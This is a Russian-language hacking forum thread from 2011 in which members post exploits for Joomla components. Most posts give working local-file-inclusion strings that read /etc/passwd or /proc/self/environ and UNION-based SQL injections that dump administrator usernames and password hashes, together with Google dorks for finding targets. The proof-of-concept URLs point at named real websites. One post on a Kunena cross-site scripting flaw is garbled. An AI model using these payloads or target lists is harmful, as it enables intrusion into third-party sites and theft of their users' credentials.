HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #201  
Старый 09.04.2011, 14:32
White Bear
Guest
Сообщений: n/a
Провел на форуме:
1941

Репутация: 0
По умолчанию

(com_jce) BLIND sql injection vulnerability

Description:

JCE makes creating and editing Joomla!®

content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,

without limitations, and without needing to know or learn HTML, XHTML, CSS...

exploit & p0c

[!] index.php?option=com_jce&Itemid=[valid Itemid]

Example p0c

[!] http://host/index.php?option=com_jce&Itemid=8
 
Ответить с цитированием

  #202  
Старый 10.04.2011, 16:39
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

LFI in Joomla component com_immobilien

Доброго времени суток, уважаемые форумчане.

Тип: LFI

Компонент: com_immobilien

Версия: Не знаю, тк шелл не залил

Найдена: 10.04.2011 by z0mbyak

Dork: inurl:"com_immobilien"

Vuln Code: Не искал)))

Link:

index.php?option=com_immobilien&controller=

Exploit:

../../../../../../../../../../../etc/passwd%00

PoC:

http://www.sundz-immobilien.de/index.php?option=com_immobilien&controller=../../../CREDITS.php%00

http://www.szaboimmobilien.de/index.php?option=com_immobilien&controller=../../../../../../../../../../../proc/self/environ%00

P.S Вроде не боян)
 
Ответить с цитированием

  #203  
Старый 10.04.2011, 23:54
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Multiple Vulnerabilities in Jomla Component com_tender

И снова здравствуйте)

Тип: LFI

exploit: ../../../../../../../../../../etc/passwd%00

PoC:

http://www.moscow-tenders.ru/index.php?option=com_tender&controller=../../../../../../../../../../etc/passwd%00


Тип: Sql Inj

Вообще, массового я так и не нашел, но компонент очень дырявый)

PoC:

http://irp.omsk.info/index.php?option=com_tender&view=list&filter_type= category&filter_category%5B%5D=327&Itemid=5&comple ted=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass word,0x3a,usertype),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36+from+jos_users+where+usertype='Super%20Admi nistrator'--

https://www.itbidding.com/index.php?option=com_tender&act=opening_tender&act ion=edit_opening_tender&gov_tender_id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

P.S. Надеюсь не баян)))
 
Ответить с цитированием

  #204  
Старый 20.04.2011, 12:56
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

SQL-Inj in Joomla com_tpjobs

Доброго времени суток, уважаемые форумчане.

В данном компоненте уже находили BSQL-Inj

(http://www.exploit-db.com/exploits/10950)

Но есть и по проще варианты)

Например:

уязвимость в параметре id, при task=detailjob

Код:

Код:
Code:
//detailJob
function detailJob($option){
	global $mainframe;
	$user	=& JFactory::getUser();
	$id 	= JRequest::getVar('id', 0, 'get', 'string');

	if(empty($id))
	{
		$return	= JRoute::_('index.php?option=com_tpjobs');
		$mainframe->redirect( $return );	
	}

	$db 	= & JFactory::getDBO();		
	$query = "select a.*,comp_name,degree_level,pos_type,type_salary,g.country,i.industry,e.exp_name from #__tpjobs_job a".
	         " LEFT JOIN #__tpjobs_degree_level b ON a.id_degree_level = b.id".
			 " LEFT JOIN #__tpjobs_pos_type c ON a.id_pos_type = c.id".
			 " LEFT JOIN #__tpjobs_type_salary d ON a.id_salary_type = d.id".
			 " LEFT JOIN #__tpjobs_job_exp e ON a.id_job_exp = e.id".
			 " LEFT JOIN #__tpjobs_job_spec f ON a.id_job_spec = f.id".
			 " LEFT JOIN #__tpjobs_country g ON a.id_country = g.id". 
			 " LEFT JOIN #__tpjobs_employer h ON a.employer_id = h.user_id".
			 " LEFT JOIN #__tpjobs_industry i ON h.id_industry = i.id".
			 " where a.id = ".$id;	
	$db->setQuery( $query);
	
	$data = $db->loadObjectList();
	if(!count($data))
	{
		$return	= JRoute::_('index.php?option=com_tpjobs');
		$mainframe->redirect( $return );	
	}
	
	HTML_front_tpjobs::detailJob($data,$option);
}
В итоге нам нужно только подобрать кол-во колонок через order+by (за частую ~20-30)

POC:

http://bankihr.by/index.php?option=com_tpjobs&task=detailjob&id=1+un ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30--

http://www.ingenjorstorget.se/index.php?option=com_tpjobs&task=detailjob&id=9999 99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,group_concat%28username,0x3a,password,0x3a,usert ype%29,15,16,17,18,19,20,21,22,23,24,25+from+jos_u sers--
 
Ответить с цитированием

  #205  
Старый 21.04.2011, 17:43
Jаger
Guest
Сообщений: n/a
Провел на форуме:
2301

Репутация: 10
По умолчанию

Joomnik
Sql Injection:
  • Need: Maqic_Quotes = Off
  • /index.php
  • http://localhost/index.php?option=com_joomnik&album=9' and 1!=1 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9, 10,11,12,13 from jos_users where gid=25 limit 0,1-- 1
 
Ответить с цитированием

  #206  
Старый 28.04.2011, 17:41
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию

Kunena Forum

Активная XSS

Уязвимый компонент:Kunena Forum, версии JS

[/QUOTE]
" if author else f"
Цитата:
">JS
Dork:inurl:/index.php/component/kunena

Автор: eclipse
 
Ответить с цитированием

  #207  
Старый 02.06.2011, 14:07
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию

juser_bestbefore

Раскрытие путейпри обращении к скрипту juser_bestbefore.php

Причина:

Отсутствует инициализация глобальной переменной $maingrame, в следствии чего возникает фатальная ошибка

Код:
Code:
Call to a member function isAdmin() on a non-object in
код содержащий ошибку

Код:
Code:
function onAfterInitialise() {	// latest user log-in details have been updated at this stage
		global $mainframe;

		// Not for admin backend
		if ($mainframe->isAdmin()) {
			return;
		}
	...
	}
Исправление:

Перед использованием добавить инициализацию переменной

Код:
Code:
$mainframe = JFactory::getApplication();
Автор: eclipse
 
Ответить с цитированием

  #208  
Старый 14.06.2011, 00:26
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

SQl-Inj в компоненте com_prywatne

Тип: Sql-Inj

Модуль: com_prywatne

Dork: inurl:"index.php?option=com_prywatne"

Данный компонент установлен только на одном сайте, но мало ли вдруг пригодится.

Exploit:

+union+select+group_concat(username,0x3a,password, 0x3a,usertype)+from+jos_users--


PoC:

http://infomedic.mentax.pl/old_site/index.php?option=com_prywatne&sid=30&mid=0&pid=34+ union+select+group_concat(username,0x3a,password,0 x3a,usertype)+from+jos_users--
 
Ответить с цитированием

  #209  
Старый 23.06.2011, 01:56
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Joomla com_com_propiedades Multiple

# Exploit Title: Joomla com_com_propiedades Multiple Vulnerabilities

# Date: 23.06.2011

# Author: z0mbyak

# Vendor or Software Link: find by yourself

# Version: Don't know

# Category: [remote, webapps.]

# Google dork: inurl:"index.php?option=com_propiedades"

# Tested on: FreeBSD

LFI Vulnerability:

exploit: ../../../../../../../../../../../../etc/passwd%00

VulnSite: http://www.arifmetika.com.ua/index.php?option=com_propiedades&controller=../../../../../../../../../../../etc/passwd%00

SQL-Inj Vulnerability:

exploit: null+union+select+1,2,3,4,5,6,7,88,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,277,28,29,30 ,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,61,62,63,64--&id_ciudad=4&id_sector=0

VulnSite: http://www.diplomat-kurgan.ru/index.php?option=com_propiedades&task=search&id_pr ovincia=null+union+select+1,2,3,4,5,6,7,88,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,277, 28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,61,62,63,6 4--&id_ciudad=4&id_sector=0

P.S. Вообще инъекцию я крутил через пост, так как поиск на аяксе, но специально для особо ленивых размещаю гет)

Специально для forum.antichat.ru и rdot.org/forum/

z0mbyak.
 
Ответить с цитированием

  #210  
Старый 02.07.2011, 09:27
drift
Новичок
Регистрация: 01.11.2008
Сообщений: 0
Провел на форуме:
13329

Репутация: 0
По умолчанию

Joomla mdigg Component SQL Injection Vulnerability

Цитата:
Сообщение от None  
================================================== ===================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > > |_( ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure
Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com
#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
================================================== ====================
####
# Exploit Title: joomla component SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Powered by joomla" inurl:link_id
# Category:: Webapps
# Tested on: [Windows Vista Edition Intégral- French]
# http://demo15.joomlaapps.com/
# http://demo15.joomlaapps.com/mdigg.html
####[*] ExpLo!T :
http://127.0.0.1/?act=story_lists&task=item&link_id=1'
http://127.0.0.1/?act=story_lists&task=item&link_id=[SQLi]
http://127.0.0.1/path/?act=story_lists&task=item&link_id=[SQLi]
####
[+] Peace From Algeria
####
=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others |
================================================== ========================================== |
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ